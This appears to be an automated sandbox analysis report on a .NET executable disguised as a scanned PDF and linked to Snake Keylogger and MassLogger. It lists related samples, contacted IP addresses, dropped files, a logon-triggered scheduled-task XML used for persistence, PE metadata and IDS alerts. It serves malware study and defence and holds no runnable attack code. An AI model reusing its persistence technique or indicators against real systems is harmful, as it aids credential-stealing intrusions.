                                                                                UTMEMUSQuote1.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                • 132.226.8.169
                                                                                la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                • 128.169.88.233
                                                                                22390016593_20210618_14375054_HesapOzeti.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                • 132.226.247.73
                                                                                Halkbank_Ekstre_20241022_081224_563756.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                • 132.226.247.73
                                                                                REVISED INVOICE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                • 132.226.247.73
                                                                                SIPARIS-290124.PDF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                • 132.226.8.169
                                                                                Produccion.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                • 132.226.247.73
                                                                                080210232024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                • 132.226.247.73
                                                                                WBPWLAj09q.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                • 132.226.247.73
                                                                                Adeleidae.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                • 132.226.8.169
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                54328bd36c14bd82ddaa0c04b25ed9adQuote1.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                • 188.114.97.3
                                                                                22390016593_20210618_14375054_HesapOzeti.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                • 188.114.97.3
                                                                                g1TLK7mbZD.imgGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 188.114.97.3
                                                                                EKSTRE_1022.exeGet hashmaliciousMassLogger RATBrowse
                                                                                • 188.114.97.3
                                                                                Purchase Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                • 188.114.97.3
                                                                                Halkbank_Ekstre_20241022_081224_563756.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                • 188.114.97.3
                                                                                SIPARIS-290124.PDF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                • 188.114.97.3
                                                                                Renommxterne.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                • 188.114.97.3
                                                                                PAYMENT ADVISE MT107647545.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                • 188.114.97.3
                                                                                Produccion.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                • 188.114.97.3
                                                                                3b5074b1b5d032e5620f69f9f700ff0ecopia de pago____xls.exeGet hashmaliciousDarkCloudBrowse
                                                                                • 149.154.167.220
                                                                                Quote1.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                • 149.154.167.220
                                                                                runtime.exeGet hashmaliciousUnknownBrowse
                                                                                • 149.154.167.220
                                                                                runtime.exeGet hashmaliciousUnknownBrowse
                                                                                • 149.154.167.220
                                                                                https://temp.farenheit.net/XL1VkZE1FVGZjL0VwUUt5cWc4dkk1SWpqVFFTMUtQZ0krRFhobktOS05RSWpVMTZIYzk3b3hOUTBoZ2VYdnAzM21wZnYwMVBmdGN0MW12M09qVmMzbnNVeVpkeXBxeHVGd2V4eDRvVlZ5dERsakpjbGV3ZVZxRVhlZ0F6Q3hwQlptYUUyRFhHRzY3YkRXQ3hjWmhBZDBpMkNpakJDSnhzUG9xa2k2ZkdacVpDZVhFVFppeUJLcHJIaC0teVVJeERBTFd0K3k3b01rYS0tRk9zSWNIVEd0blVHZVlhTlFnVUxldz09?cid=2242420613Get hashmaliciousUnknownBrowse
                                                                                • 149.154.167.220
                                                                                nicegirlwithnewthingswhichevennobodknowthatkissingme.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                • 149.154.167.220
                                                                                #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                • 149.154.167.220
                                                                                EXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletOpsistype.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                • 149.154.167.220
                                                                                QYP0tD7z0c.exeGet hashmaliciousDCRatBrowse
                                                                                • 149.154.167.220
                                                                                https://docsend.com/view/44v95uq7wngs3w6tGet hashmaliciousHTMLPhisher, HtmlDropperBrowse
                                                                                • 149.154.167.220
                                                                                No context
                                                                                Process:C:\Users\user\AppData\Roaming\QeSBxb.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1415
                                                                                Entropy (8bit):5.352427679901606
                                                                                Encrypted:false
                                                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRuAE4KzecKIE4oKNzKorE4x84j:MIHK5HKH1qHiYHKh3oPHKMRuAHKzectP
                                                                                MD5:3978978DE913FD1C068312697D6E5917
                                                                                SHA1:1DABBE7FB8F38F6EBF474CE5F0ECAA89F48E2538
                                                                                SHA-256:33B7B1668DDD3AB39711F9F93B667F6F2F674348A79228BFA163BA625B37F120
                                                                                SHA-512:78694B97F5D03758F503155E5CE5B85AABDF9690F0DFBC51FCE9926BE2D86BCF99E008659420F1E8489A7F6EA125F2776D4C6DC4B151566B529454512352953D
                                                                                Malicious:false
                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll"
                                                                                Process:C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1415
                                                                                Entropy (8bit):5.352427679901606
                                                                                Encrypted:false
                                                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRuAE4KzecKIE4oKNzKorE4x84j:MIHK5HKH1qHiYHKh3oPHKMRuAHKzectP
                                                                                MD5:3978978DE913FD1C068312697D6E5917
                                                                                SHA1:1DABBE7FB8F38F6EBF474CE5F0ECAA89F48E2538
                                                                                SHA-256:33B7B1668DDD3AB39711F9F93B667F6F2F674348A79228BFA163BA625B37F120
                                                                                SHA-512:78694B97F5D03758F503155E5CE5B85AABDF9690F0DFBC51FCE9926BE2D86BCF99E008659420F1E8489A7F6EA125F2776D4C6DC4B151566B529454512352953D
                                                                                Malicious:true
                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll"
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):2232
                                                                                Entropy (8bit):5.380805901110357
                                                                                Encrypted:false
                                                                                SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZVyus:lGLHyIFKL3IZ2KRH9Ougos
                                                                                MD5:F8C462B0F7651DB9CEF8003667880DD9
                                                                                SHA1:AE39DE29225FAED9F09BEEA289FAD0C7AD659D1F
                                                                                SHA-256:C4E627CC68F1B43600B88A4C62690F1C41107602A19FB9C6ACBF0BD302FA03F4
                                                                                SHA-512:5CFA7F7EC6C990E8C54F8954137A9DC8DDEE3868235F0C5A7151A63E82E576FC40AD950F5E9EBB1612B53AD0A7E1CA07E9102A21A2B1CDE302CE39F6A89C30CA
                                                                                Malicious:false
                                                                                Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
                                                                                File Type:XML 1.0 document, ASCII text
                                                                                Category:dropped
                                                                                Size (bytes):1579
                                                                                Entropy (8bit):5.106801165549276
                                                                                Encrypted:false
                                                                                SSDEEP:24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtcxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuTcv
                                                                                MD5:01B91296F5833DCCD5611DA4973FF3D0
                                                                                SHA1:9C2CBAE87B70F817DD4ACF46781C2B62D798DA53
                                                                                SHA-256:A422C7FB747314414CE1680FCF1067EC9CDBEF14C1A304B5B0FA7A9BF97DC785
                                                                                SHA-512:C3454E1FCD6B193AF68355E99CEB87337F7D70BC740715A599B964C7FC7B170F587EB6E697B55FC6FE64391256056BF747DA2D9C846585A97512A8819415D2A9
                                                                                Malicious:true
                                                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                                                                Process:C:\Users\user\AppData\Roaming\QeSBxb.exe
                                                                                File Type:XML 1.0 document, ASCII text
                                                                                Category:dropped
                                                                                Size (bytes):1579
                                                                                Entropy (8bit):5.106801165549276
                                                                                Encrypted:false
                                                                                SSDEEP:24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtcxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuTcv
                                                                                MD5:01B91296F5833DCCD5611DA4973FF3D0
                                                                                SHA1:9C2CBAE87B70F817DD4ACF46781C2B62D798DA53
                                                                                SHA-256:A422C7FB747314414CE1680FCF1067EC9CDBEF14C1A304B5B0FA7A9BF97DC785
                                                                                SHA-512:C3454E1FCD6B193AF68355E99CEB87337F7D70BC740715A599B964C7FC7B170F587EB6E697B55FC6FE64391256056BF747DA2D9C846585A97512A8819415D2A9
                                                                                Malicious:false
                                                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                                                                Process:C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):840712
                                                                                Entropy (8bit):7.85489366422345
                                                                                Encrypted:false
                                                                                SSDEEP:12288:zbedZeA56A4KUwU2dEa4oDr2rxR5NiYrDkhNSOG6BgKBizbNEW0JTWxH+odSheub:75wUWEa4iU8wDINnenL/5twheu35wq
                                                                                MD5:D8DAEB11E006370F3B454DF74C382CED
                                                                                SHA1:3351AF8F5627D4DF174D4C659391A40D9563CA37
                                                                                SHA-256:7B57E6494BB05F09E8A09A69B3C9F28239FE18CB469D223826C95BEE2D650197
                                                                                SHA-512:D57FE6E72ACBBB577C9B4DD36A53367A4D0CADFDE7E32C036CAA7ADFFD01AE021BAA8E2BEFF7BBF06FB3927C0B74F84725F0714D05B7ED1E81E1F5A5B258FB86
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 26%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...^}.g................................. ........@.. ....................................@....................................W........................6........................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......|=..Xs...........................................................0..A....... T........%.4...(.....5... 6........%.!...(....."...(....*.....&*.....s....}......}.....(.....(.....(....*.....&*....0..........~5.......E....x...q...\...F.......6...x....{....{@... R... h...(...+. 9.Cz.(.... .... ....(...+.. ..... p...Y.+..,.. 7.... U...Y.+..+..{....{@...o....(......8f...*.....&*...0...............E................;....................... .... ....(......,....+..+..{....{@...
                                                                                Process:C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):26
                                                                                Entropy (8bit):3.95006375643621
                                                                                Encrypted:false
                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                Malicious:true
                                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Entropy (8bit):7.85489366422345
                                                                                TrID:
                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                                • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                                • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                File name:Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
                                                                                File size:840'712 bytes
                                                                                MD5:d8daeb11e006370f3b454df74c382ced
                                                                                SHA1:3351af8f5627d4df174d4c659391a40d9563ca37
                                                                                SHA256:7b57e6494bb05f09e8a09a69b3c9f28239fe18cb469d223826c95bee2d650197
                                                                                SHA512:d57fe6e72acbbb577c9b4dd36a53367a4d0cadfde7e32c036caa7adffd01ae021baa8e2beff7bbf06fb3927c0b74f84725f0714d05b7ed1e81e1f5a5b258fb86
                                                                                SSDEEP:12288:zbedZeA56A4KUwU2dEa4oDr2rxR5NiYrDkhNSOG6BgKBizbNEW0JTWxH+odSheub:75wUWEa4iU8wDINnenL/5twheu35wq
                                                                                TLSH:4605128DBA539A30CA5C1F3BC4039644C7F7D422D2A6E61B18C919F64F5D7A9C04AF8B
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...^}.g................................. ........@.. ....................................@................................
                                                                                Icon Hash:00928e8e8686b000
                                                                                Entrypoint:0x4cb12e
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:true
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x671A7D5E [Thu Oct 24 17:01:18 2024 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:4
                                                                                OS Version Minor:0
                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                Signature Valid:false
                                                                                Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                                Error Number:-2146869232
                                                                                Not Before, Not After
                                                                                • 13/11/2018 01:00:00 09/11/2021 00:59:59
                                                                                Subject Chain
                                                                                • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                                Version:3
                                                                                Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                                Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                                Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                                Serial:7C1118CBBADC95DA3752C46E47A27438
                                                                                Instruction
                                                                                jmp dword ptr [00402000h]
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xcb0d40x57.text
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xcc0000x800.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0xc9e000x3608
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xce0000xc.reloc
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x20000xc91340xc9200f90ae51628faf20819ce4eac4b54f77eFalse0.9215824561062772data7.862440033564903IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                .rsrc0xcc0000x8000x800fde212614aa7f5d96014b302983008a0False0.33984375data3.489310162709601IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .reloc0xce0000xc0x200f7e3ce9f95a1fce48804d15a5c5ba7fdFalse0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                RT_VERSION0xcc0900x3a0data0.4224137931034483
                                                                                RT_MANIFEST0xcc4400x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                DLLImport
                                                                                mscoree.dll_CorExeMain
                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                2024-10-25T09:17:11.331466+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849710132.226.247.7380TCP
                                                                                2024-10-25T09:17:13.033043+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849710132.226.247.7380TCP
                                                                                2024-10-25T09:17:13.705596+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849713188.114.97.3443TCP
                                                                                2024-10-25T09:17:14.642211+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849716132.226.247.7380TCP
